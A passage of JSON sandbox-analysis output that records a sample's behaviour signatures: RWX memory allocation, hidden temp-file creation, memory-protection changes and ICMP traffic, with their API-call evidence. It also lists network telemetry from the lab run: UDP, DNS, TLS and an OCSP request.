"marks":[
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684e5000"
},
"time":"2020-12-09T15:53:21.765875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":105
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684d8000"
},
"time":"2020-12-09T15:53:21.765875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":111
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684d4000"
},
"time":"2020-12-09T15:53:21.812875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":152
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684a8000"
},
"time":"2020-12-09T15:53:21.812875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":158
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x684e2000"
},
"time":"2020-12-09T15:53:21.843875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":199
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x68488000"
},
"time":"2020-12-09T15:53:21.859875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":205
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x673c1000"
},
"time":"2020-12-09T15:53:22.328875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":605
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x06767000"
},
"time":"2020-12-09T15:53:22.359875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":642
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x06767000"
},
"time":"2020-12-09T15:53:22.359875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":645
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x669a9000"
},
"time":"2020-12-09T15:54:20.156875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":1464
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x66900000"
},
"time":"2020-12-09T15:54:22.359875",
"tid":2788,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":1677
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x668c9000"
},
"time":"2020-12-09T15:54:22.390875",
"tid":2788,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":1769
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":65536,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x34d80000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2147
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75506000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2148
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a74000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2149
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a73000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2150
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a75000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2151
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a73000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2152
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75d17000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2153
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x75a73000"
},
"time":"2020-12-09T15:54:25.062875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2155
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":65536,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x34d80000"
},
"time":"2020-12-09T15:54:25.171875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2282
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x74d87000"
},
"time":"2020-12-09T15:54:25.171875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2283
},
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":0,
"length":4096,
"protection":64,
"process_handle":"0xffffffff",
"base_address":"0x74d81000"
},
"time":"2020-12-09T15:54:25.171875",
"tid":2228,
"flags":{
"protection":"PAGE_EXECUTE_READWRITE"
}
},
"pid":2204,
"type":"call",
"cid":2284
}
],
"name":"allocates_rwx"
},
{
"families":[
],
"description":"Creates hidden or system file",
"severity":2,
"ttp":{
"T1158":{
"short":"Hidden Files and Directories",
"long":"To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \\u2018hidden\\u2019 file. These files don\\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \\u2013a for Linux and macOS)."
}
},
"markcount":1,
"references":[
],
"marks":[
{
"call":{
"category":"file",
"status":1,
"stacktrace":[
],
"api":"NtCreateFile",
"return_value":0,
"arguments":{
"create_disposition":5,
"file_handle":"0x0000057c",
"filepath":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"desired_access":"0x40100080",
"file_attributes":2,
"filepath_r":"\\??\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\~$ckoo-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"create_options":4194400,
"status_info":2,
"share_access":0
},
"time":"2020-12-09T15:53:21.687875",
"tid":2228,
"flags":{
"create_disposition":"FILE_OVERWRITE_IF",
"desired_access":"FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE",
"create_options":"FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT",
"file_attributes":"FILE_ATTRIBUTE_HIDDEN",
"status_info":"FILE_CREATED",
"share_access":""
}
},
"pid":2204,
"type":"call",
"cid":19
}
],
"name":"creates_hidden_file"
},
{
"families":[
],
"description":"Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time)",
"severity":2,
"ttp":{
},
"markcount":1,
"references":[
],
"marks":[
{
"call":{
"category":"process",
"status":1,
"stacktrace":[
],
"api":"NtProtectVirtualMemory",
"return_value":0,
"arguments":{
"process_identifier":2204,
"stack_dep_bypass":0,
"stack_pivoted":0,
"heap_dep_bypass":1,
"length":4096,
"protection":32,
"process_handle":"0xffffffff",
"base_address":"0x7ef80000"
},
"time":"2020-12-09T15:53:22.078875",
"tid":2700,
"flags":{
"protection":"PAGE_EXECUTE_READ"
}
},
"pid":2204,
"type":"call",
"cid":420
}
],
"name":"protection_rx"
},
{
"families":[
],
"description":"Generates some ICMP traffic",
"severity":4,
"ttp":{
},
"markcount":0,
"references":[
],
"marks":[
],
"name":"network_icmp"
}
],
"network":{
"tls":[
{
"server_random":"5fd0e4ee8bf9477a3a1f1d5fd6b901a1021860f734bde647444f574e47524400",
"session_id":"1147e31fd36b4ec050984281fd92d8b704520731aa425a115b329f60c11dacdc"
},
{
"server_random":"5fd0e4fa29a895a91b4960ac699334b0ec5dbe05d62a4a24444f574e47524400",
"session_id":"fe6d4573063fb3d8a3eb7c512c544c7e50d6c6c8248b090ce9d93c49e3fb73ae"
}
],
"udp":[
{
"src":"192.168.56.101",
"dst":"192.168.56.104",
"offset":3098,
"time":8.419480085372925,
"dport":58129,
"sport":5355
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"offset":3343,
"time":6.378218173980713,
"dport":137,
"sport":137
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"offset":3828,
"time":8.394395112991333,
"dport":51224,
"sport":5355
},
{
"src":"192.168.56.102",
"dst":"192.168.56.104",
"offset":3981,
"time":8.919831991195679,
"dport":59556,
"sport":5355
},
{
"src":"192.168.56.103",
"dst":"192.168.56.104",
"offset":4224,
"time":14.03511905670166,
"dport":58861,
"sport":5355
},
{
"src":"192.168.56.103",
"dst":"192.168.56.104",
"offset":4379,
"time":14.044678211212158,
"dport":63910,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"104.20.139.65",
"offset":4624,
"time":14.074964046478271,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"151.139.128.14",
"offset":12072,
"time":53.04389500617981,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"162.159.130.233",
"offset":19300,
"time":25.04939317703247,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":92785,
"time":12.614320039749146,
"dport":53,
"sport":49366
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":92872,
"time":12.46611499786377,
"dport":53,
"sport":51865
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":92974,
"time":8.875707149505615,
"dport":53,
"sport":53525
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93070,
"time":7.358427047729492,
"dport":53,
"sport":53894
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93173,
"time":12.999488115310669,
"dport":53,
"sport":55622
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93321,
"time":7.3739330768585205,
"dport":53,
"sport":57211
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93469,
"time":10.010270118713379,
"dport":53,
"sport":58700
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93617,
"time":10.020308017730713,
"dport":53,
"sport":59575
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93720,
"time":12.999208211898804,
"dport":53,
"sport":60001
},
{
"src":"192.168.56.104",
"dst":"192.168.56.1",
"offset":93823,
"time":7.373367071151733,
"dport":53,
"sport":64248
},
{
"src":"192.168.56.104",
"dst":"192.168.56.101",
"offset":94244,
"time":6.466797113418579,
"dport":53018,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.101",
"offset":94398,
"time":6.476027011871338,
"dport":56987,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":95367,
"time":6.278124094009399,
"dport":49687,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":95611,
"time":82.47678112983704,
"dport":49887,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":95765,
"time":82.48909616470337,
"dport":61453,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.102",
"offset":96009,
"time":6.270061016082764,
"dport":62642,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.103",
"offset":96618,
"time":15.063050031661987,
"dport":52597,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.103",
"offset":96772,
"time":15.056749105453491,
"dport":56273,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.105",
"offset":97016,
"time":10.77050518989563,
"dport":57988,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.105",
"offset":97170,
"time":10.779236078262329,
"dport":64434,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.106",
"offset":97687,
"time":18.637542009353638,
"dport":51312,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.106",
"offset":97841,
"time":18.64597201347351,
"dport":51417,
"sport":5355
},
{
"src":"192.168.56.104",
"dst":"192.168.56.255",
"offset":98085,
"time":8.103556156158447,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"192.168.56.255",
"offset":118317,
"time":14.104444026947021,
"dport":138,
"sport":138
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":121727,
"time":30.78724718093872,
"dport":5355,
"sport":49256
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":122047,
"time":47.169366121292114,
"dport":5355,
"sport":49677
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":122367,
"time":9.911517143249512,
"dport":5355,
"sport":49871
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":122687,
"time":36.33794021606445,
"dport":5355,
"sport":50510
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123007,
"time":60.29358506202698,
"dport":5355,
"sport":51052
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123327,
"time":41.84375715255737,
"dport":5355,
"sport":51098
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123647,
"time":8.394129037857056,
"dport":5355,
"sport":51224
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":123853,
"time":27.58063316345215,
"dport":5355,
"sport":51331
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":124173,
"time":8.028341054916382,
"dport":5355,
"sport":51353
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":124501,
"time":49.73521304130554,
"dport":5355,
"sport":51369
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":124821,
"time":82.0536150932312,
"dport":5355,
"sport":51548
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":125237,
"time":17.18865203857422,
"dport":5355,
"sport":53088
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":125557,
"time":11.060317993164062,
"dport":5355,
"sport":53564
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":125853,
"time":52.45841908454895,
"dport":5355,
"sport":54041
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":126173,
"time":55.02798509597778,
"dport":5355,
"sport":54767
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":126493,
"time":19.09524416923523,
"dport":5355,
"sport":55406
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":126813,
"time":16.051506996154785,
"dport":5355,
"sport":55474
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":127109,
"time":10.043001174926758,
"dport":5355,
"sport":57346
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":127429,
"time":44.40907120704651,
"dport":5355,
"sport":58033
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":127749,
"time":8.418867111206055,
"dport":5355,
"sport":58129
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128045,
"time":25.0122652053833,
"dport":5355,
"sport":58238
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128365,
"time":14.034866094589233,
"dport":5355,
"sport":58861
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128571,
"time":13.826195001602173,
"dport":5355,
"sport":59066
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":128891,
"time":8.013374090194702,
"dport":5355,
"sport":59436
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":129235,
"time":6.48179817199707,
"dport":5355,
"sport":59513
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":129563,
"time":8.919373989105225,
"dport":5355,
"sport":59556
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":129859,
"time":38.9073281288147,
"dport":5355,
"sport":60167
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":130179,
"time":21.657960176467896,
"dport":5355,
"sport":60415
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":130499,
"time":33.34561800956726,
"dport":5355,
"sport":62708
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":130819,
"time":57.73856019973755,
"dport":5355,
"sport":62836
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":131139,
"time":6.012407064437866,
"dport":5355,
"sport":63423
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":131483,
"time":62.45176601409912,
"dport":5355,
"sport":63745
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":131803,
"time":11.051077127456665,
"dport":5355,
"sport":63811
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132009,
"time":14.04456615447998,
"dport":5355,
"sport":63910
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132305,
"time":14.020031213760376,
"dport":5355,
"sport":64261
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132625,
"time":9.709530115127563,
"dport":5355,
"sport":64601
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":132945,
"time":16.042737007141113,
"dport":5355,
"sport":65149
},
{
"src":"192.168.56.104",
"dst":"224.0.0.252",
"offset":133151,
"time":16.392513036727905,
"dport":5355,
"sport":65188
},
{
"src":"192.168.56.104",
"dst":"239.255.255.250",
"offset":138874,
"time":82.3661630153656,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"239.255.255.250",
"offset":139090,
"time":81.06078314781189,
"dport":1900,
"sport":52520
},
{
"src":"192.168.56.104",
"dst":"52.109.12.21",
"offset":139854,
"time":17.045016050338745,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"52.109.76.32",
"offset":162375,
"time":20.05421805381775,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"52.109.76.68",
"offset":177490,
"time":14.056312084197998,
"dport":137,
"sport":137
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":205789,
"time":13.600309133529663,
"dport":53,
"sport":49366
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206011,
"time":16.574461221694946,
"dport":53,
"sport":49531
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206275,
"time":20.001517057418823,
"dport":53,
"sport":50099
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206550,
"time":13.45976209640503,
"dport":53,
"sport":51865
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":206877,
"time":15.999469995498657,
"dport":53,
"sport":52067
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207083,
"time":68.09831213951111,
"dport":53,
"sport":52517
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207347,
"time":16.992746114730835,
"dport":53,
"sport":52691
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207628,
"time":57.591193199157715,
"dport":53,
"sport":52818
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":207832,
"time":19.74304509162903,
"dport":53,
"sport":53506
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208109,
"time":9.866137027740479,
"dport":53,
"sport":53525
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208325,
"time":8.350524187088013,
"dport":53,
"sport":53894
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208531,
"time":52.31289315223694,
"dport":53,
"sport":54857
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208733,
"time":14.00416612625122,
"dport":53,
"sport":54955
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":208999,
"time":35.90317106246948,
"dport":53,
"sport":55406
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":209352,
"time":13.991150140762329,
"dport":53,
"sport":55622
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":209712,
"time":65.01094818115234,
"dport":53,
"sport":56053
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":209950,
"time":18.94626522064209,
"dport":53,
"sport":56090
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":210184,
"time":8.866774082183838,
"dport":53,
"sport":57211
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":210544,
"time":82.00050210952759,
"dport":53,
"sport":57718
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":210809,
"time":15.998948097229004,
"dport":53,
"sport":58699
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":211169,
"time":11.007613182067871,
"dport":53,
"sport":58700
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":211529,
"time":24.997298002243042,
"dport":53,
"sport":59140
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":211799,
"time":11.007429122924805,
"dport":53,
"sport":59575
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212005,
"time":13.991252183914185,
"dport":53,
"sport":60001
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212211,
"time":30.13395404815674,
"dport":53,
"sport":61049
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212623,
"time":20.001989126205444,
"dport":53,
"sport":61505
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":212904,
"time":24.8245210647583,
"dport":53,
"sport":62098
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":213172,
"time":30.998082160949707,
"dport":53,
"sport":62535
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":213438,
"time":8.366496086120605,
"dport":53,
"sport":64248
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":213798,
"time":36.99377417564392,
"dport":53,
"sport":64961
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":214064,
"time":14.003063201904297,
"dport":53,
"sport":65341
},
{
"src":"192.168.56.104",
"dst":"8.8.8.8",
"offset":214345,
"time":52.99387502670288,
"dport":53,
"sport":65435
},
{
"src":"192.168.56.104",
"dst":"93.184.220.29",
"offset":214603,
"time":20.04487109184265,
"dport":137,
"sport":137
},
{
"src":"192.168.56.105",
"dst":"192.168.56.104",
"offset":219265,
"time":11.060465097427368,
"dport":53564,
"sport":5355
},
{
"src":"192.168.56.105",
"dst":"192.168.56.104",
"offset":219514,
"time":11.051202058792114,
"dport":63811,
"sport":5355
},
{
"src":"192.168.56.106",
"dst":"192.168.56.104",
"offset":219673,
"time":16.051631212234497,
"dport":55474,
"sport":5355
},
{
"src":"192.168.56.106",
"dst":"192.168.56.104",
"offset":219918,
"time":16.043403148651123,
"dport":65149,
"sport":5355
}
],
"dns_servers":[
"8.8.8.8",
"192.168.56.1"
],
"http":[
{
"count":1,
"body":"",
"uri":"http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"user-agent":"Microsoft-CryptoAPI/6.1",
"method":"GET",
"host":"ocsp.comodoca4.com",
"version":"1.1",
"path":"/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
